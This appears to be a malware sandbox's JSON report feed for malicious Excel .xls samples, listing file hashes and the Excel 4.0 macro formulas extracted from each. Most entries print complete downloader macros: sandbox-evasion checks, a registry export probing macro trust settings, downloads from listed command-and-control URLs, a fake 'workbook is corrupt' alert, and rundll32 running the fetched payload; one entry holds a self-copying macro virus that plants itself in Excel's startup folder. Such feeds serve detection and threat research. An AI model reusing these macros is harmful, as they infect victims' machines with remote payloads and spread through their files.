{"version":"0.2","sample":{"sample":"","kind":"file","target":"00f9579544ce3b93b58b4b9a06724acffa23c70a9b1c6e4c0623fb8d97ff9126"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00f9579544ce3b93b58b4b9a06724acffa23c70a9b1c6e4c0623fb8d97ff9126","filesize":170496,"md5":"2026bc56cf67b94384a8e978255aac58","sha1":"79bd6423a07448a511cb4717c7f822674f6ab83b","sha256":"00f9579544ce3b93b58b4b9a06724acffa23c70a9b1c6e4c0623fb8d97ff9126","sha512":"8109f7f0d91fe1914c2857939dcbef43d988723f75ba4051f9fc22e1db036d096cf28c58612a3d3c9f6ad3cb131b8c7dc97a00e44ec20e5dc8951918815ec100","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00f9579544ce3b93b58b4b9a06724acffa23c70a9b1c6e4c0623fb8d97ff9126.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HD0XGfkNr8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00fa1019a11da3a4788a5f10eb8e29b966afee97da21ced72444ddfa417b7d1f"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00fa1019a11da3a4788a5f10eb8e29b966afee97da21ced72444ddfa417b7d1f","filesize":221184,"md5":"d41c117681292eb92a25b08656e96126","sha1":"3b4e932cb4783ea05e83481973f966e9d16e7895","sha256":"00fa1019a11da3a4788a5f10eb8e29b966afee97da21ced72444ddfa417b7d1f","sha512":"b1ce74207830c0d1765bb43f6b2d401fa376f6caae97103c6ed688a6d3ece6f76f26c23f5698f478d5688841975b532b247b01815d9b3794fac9dd7847c78f13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00fa1019a11da3a4788a5f10eb8e29b966afee97da21ced72444ddfa417b7d1f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6Jb792J4Iy\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00ff8abbbf9eb3c9773cf7b24da077930d17a88b210fb1dd515d0469063d1062"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00ff8abbbf9eb3c9773cf7b24da077930d17a88b210fb1dd515d0469063d1062","filesize":112640,"md5":"97fd29531907b9f2cb7dcec27afcf265","sha1":"1722dc5ddccafa770ceddc03138488045b401dd0","sha256":"00ff8abbbf9eb3c9773cf7b24da077930d17a88b210fb1dd515d0469063d1062","sha512":"35dc506f9f8257e92b77f4299704c1c1fc04340601310347a850b71eb7f16da959d2617fb8eb3425f31ab780768290d71bf944cba452f78333aab384a4727665","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00ff8abbbf9eb3c9773cf7b24da077930d17a88b210fb1dd515d0469063d1062.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01171bdba169c60d2750ca824aa61394f0940bf1d566e762591de92caa5954de"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"01171bdba169c60d2750ca824aa61394f0940bf1d566e762591de92caa5954de","filesize":226304,"md5":"dbd589a24d44f312f7878ef5a2014bda","sha1":"da3341ec203706996aa61f44422bc7c857d0a782","sha256":"01171bdba169c60d2750ca824aa61394f0940bf1d566e762591de92caa5954de","sha512":"b00b09aa27b9b31c6351aeff706d06592b49a0c96a2c4c926b5159fa6ef5c0c497a223b75c6de15fdff89db3c6853af92b7490bec7b4f59cf1a639fd64978673","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01171bdba169c60d2750ca824aa61394f0940bf1d566e762591de92caa5954de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"STA7jVrNVR\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"011ac1100b25f8c79b3b6b201c843588ea29dce37a745889023713a4e7f876bc"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"011ac1100b25f8c79b3b6b201c843588ea29dce37a745889023713a4e7f876bc","filesize":214528,"md5":"57643549c521befe4436941eb315dfb9","sha1":"f9fb65d7289758880b2b6992fca38420131c1091","sha256":"011ac1100b25f8c79b3b6b201c843588ea29dce37a745889023713a4e7f876bc","sha512":"f18bfb2824c567dcbce6894fd695a7c5f8637281fccc7d92110f65ff8ad688d0463f264e4980a31be18904f10ba10dff435b128baebeb871bd4b30e93cfb5c61","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"011ac1100b25f8c79b3b6b201c843588ea29dce37a745889023713a4e7f876bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5oD2lcdiv4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"012472d19bc27a284aa1c3ecf08a4b29e8e984eb49268d15eb34a25f6cd12b42"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"012472d19bc27a284aa1c3ecf08a4b29e8e984eb49268d15eb34a25f6cd12b42","filesize":144384,"md5":"9aa332642eb9abb472f5fc6885e48529","sha1":"d96c8102884cff38288f1f5591535dc6fbd3e665","sha256":"012472d19bc27a284aa1c3ecf08a4b29e8e984eb49268d15eb34a25f6cd12b42","sha512":"e8d3da4749600ec8ca916614214f71962f71b3ac505908ca4a78b67714bf0d758c6438ed25a461dcfaa55339d367fdf347201ada165b79dff09d702b7c36e935","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"012472d19bc27a284aa1c3ecf08a4b29e8e984eb49268d15eb34a25f6cd12b42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"cuUgdOIWjD\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"014235c1fa9175a5ea55a7e9ebe319d6b33dd6e1c61f6c14e76529cd90a6d224"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"014235c1fa9175a5ea55a7e9ebe319d6b33dd6e1c61f6c14e76529cd90a6d224","filesize":168960,"md5":"071515863f9f6b48a989ae76351cea64","sha1":"d06493723a6874e59085b6a0aadff42dbfea3c3c","sha256":"014235c1fa9175a5ea55a7e9ebe319d6b33dd6e1c61f6c14e76529cd90a6d224","sha512":"3ad61b48c8bd06a3b18d59482c1c979bfbf92aeb15b0eba2e752a3f95d71f247130481f9a857b4715d13d04274a524cef3ce0d5e2c80633cb71b91df72905f33","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"014235c1fa9175a5ea55a7e9ebe319d6b33dd6e1c61f6c14e76529cd90a6d224.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zPgeFWmARH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01485ba362412ff849134d2690a79744e5401171a3c492c39dc5bcc67b782a25"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"01485ba362412ff849134d2690a79744e5401171a3c492c39dc5bcc67b782a25","filesize":209408,"md5":"de102c90eb7ec1b45c19d93bd917ca82","sha1":"e72d22cc01e8a2847b01040364f77ea629a87e02","sha256":"01485ba362412ff849134d2690a79744e5401171a3c492c39dc5bcc67b782a25","sha512":"764e17a199e9b973eb0173031feeb95441263f8c42ac1f2b99870b9b7c39f6d90cff6a5b234d835cc71504c2d7c4a5a29c2e073a6959b2538b73d6c24e1672be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01485ba362412ff849134d2690a79744e5401171a3c492c39dc5bcc67b782a25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2k30VSRJxg\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"014fd2ee9ad1e141a67a440f7b2e598392131a1fe56aa5983e2cbcba0e7b5b3d"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"014fd2ee9ad1e141a67a440f7b2e598392131a1fe56aa5983e2cbcba0e7b5b3d","filesize":209920,"md5":"c65d558700e0b6e42a466cb56559bede","sha1":"3ea3e5ce05b8486c4375a249256736015bcbc769","sha256":"014fd2ee9ad1e141a67a440f7b2e598392131a1fe56aa5983e2cbcba0e7b5b3d","sha512":"1e0bb7170147e4c8bab7fae8e94adacdf9c44c48b93ba6f122b92b96c4b92f4d4e4fe4c9433625ea9d996bc391644f9bcd567601aa92a64287e5e9dc01cd2a36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"014fd2ee9ad1e141a67a440f7b2e598392131a1fe56aa5983e2cbcba0e7b5b3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"h30BHM0Jvh\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01613a622d97b91cacb932bee66443a1c0f1e3b2bf982cee2ad1e6c9c9f661f5"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"01613a622d97b91cacb932bee66443a1c0f1e3b2bf982cee2ad1e6c9c9f661f5","filesize":132608,"md5":"680588b3862919b4e1f3edc79342bb64","sha1":"dd6e4f00ec4deb169cd3c792b9bca031439daeca","sha256":"01613a622d97b91cacb932bee66443a1c0f1e3b2bf982cee2ad1e6c9c9f661f5","sha512":"64aafe6c1be18f830b7cd38c09386c6809322f66216972bca72693aff37847a13a04c15f6fcec6aa70ba052da05e89b5f3ee49871bcb25f8a66dc0af53dfb4ca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01613a622d97b91cacb932bee66443a1c0f1e3b2bf982cee2ad1e6c9c9f661f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"m8pdNcWtbk\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"017233c1771a8f8e9c8af1ae7af75fc321500aa588a45095fd83f476c0f1336b"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"017233c1771a8f8e9c8af1ae7af75fc321500aa588a45095fd83f476c0f1336b","filesize":185344,"md5":"f653e618073b750b76f4ff4af20d8239","sha1":"3cb511c8aa6945985ccd32d9f9b54a826c410726","sha256":"017233c1771a8f8e9c8af1ae7af75fc321500aa588a45095fd83f476c0f1336b","sha512":"6da505aaa8b401d58f43b1ca074823864c731b51cd272286db63cd91b038072a131c46d6238b70e7fd5ebeb860b674812fc8a41cc596303e75aba9e9d438f20b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"017233c1771a8f8e9c8af1ae7af75fc321500aa588a45095fd83f476c0f1336b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01761b06c24baa818b0a75059e745871246a5e9c6ce0243ad96e8632342cbb59"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01761b06c24baa818b0a75059e745871246a5e9c6ce0243ad96e8632342cbb59","filesize":50176,"md5":"90ee788fbf48108b4536381ad3ab0e5c","sha1":"4eb90535394649ba10e692fd8d368df8f8acff35","sha256":"01761b06c24baa818b0a75059e745871246a5e9c6ce0243ad96e8632342cbb59","sha512":"b46ec9adfda228cb0315f77c726b407419d7cc752de307922c5ccad52566627b686da240b6f62a9c4d6eb2f81fbed268f7af859debf7cc05c2dd680224dbc294","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01761b06c24baa818b0a75059e745871246a5e9c6ce0243ad96e8632342cbb59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"ALERT(\"XF.Classic.Poppy by VicodinES\",2)\nALERT(\"?1998 The Narkotic Network\",2)\nRETURN()\nRETURN()\nNEW(1)\nWORKBOOK.INSERT(1)\nWORKBOOK.INSERT(1)\nACTIVATE.PREV()\nWORKBOOK.COPY(\"00000ppy\",\"\")\nWORKBOOK.NAME(\"Sheet3\",\"Sheet99\")\nWORKBOOK.NAME(\"Sheet1\",\"Sheet3\")\nWORKBOOK.NAME(\"Sheet99\",\"Sheet1\")\nPROTECT.DOCUMENT(TRUE,,\"VicodinES\",TRUE)\nWORKBOOK.PREV()\nWORKBOOK.PREV()\nWORKBOOK.PREV()\nSAVE.AS(\"C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.\")\nFILE.CLOSE()\nRETURN()\nWORKBOOK.HIDE(\"00000ppy\")\nRETURN()\nERROR(FALSE)\nON.TIME(\"6:30:00 PM\",\"Hello\")\nON.TIME(\"6:30:00 AM\",\"Morning\")\nON.SHEET(,\"Poppy\",TRUE)\nRETURN()\nSET.NAME(\"Document_array\",DOCUMENTS())\nRETURN()\nRETURN()\nERROR(FALSE)\nACTIVATE.PREV()\nWORKBOOK.COPY(\"00000ppy\",\"\")\nRETURN()\nAPP.TITLE(\"XF.Classic.Poppy\")\nMESSAGE(TRUE,\"VicodinES and Lord Natas greet you a good morning!\")\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01786aa69740586720fd7d3ad288702653307d946fbb70d92e816a02b76ca9da"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01786aa69740586720fd7d3ad288702653307d946fbb70d92e816a02b76ca9da","filesize":112128,"md5":"9a6e817d2ce9402545096720fb313843","sha1":"a0671556c5654ced69408a5da50de8b12f5a97f8","sha256":"01786aa69740586720fd7d3ad288702653307d946fbb70d92e816a02b76ca9da","sha512":"c39cddcca8200d478e3488aa7777fed724e47341c26eed5e2912547da57de2a68813e834c58f1cb07a63491371b8b908e3422da95daa6adc1759222f5a4ca6a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01786aa69740586720fd7d3ad288702653307d946fbb70d92e816a02b76ca9da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0178a7b24b08f52e58713ee45f75d51ab053e77387e34a01cb89c69af0b21d9a"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"0178a7b24b08f52e58713ee45f75d51ab053e77387e34a01cb89c69af0b21d9a","filesize":225280,"md5":"2a3d58983ecef2eb3d44a54e4b806bba","sha1":"146811a61800ac672f94e61ec9921c4ffec33a6b","sha256":"0178a7b24b08f52e58713ee45f75d51ab053e77387e34a01cb89c69af0b21d9a","sha512":"35228ce95bafaf353a1f86f2c43ec62654f52c922489017720fad212150c6d095e08ba0dfa46b0f569756a8001afcae8a24f88cb1ba5aab04502b3abf74c0396","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0178a7b24b08f52e58713ee45f75d51ab053e77387e34a01cb89c69af0b21d9a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ip56nkYcgv\",TRUE)\nGOTO(R$0C$18)"}}}]}
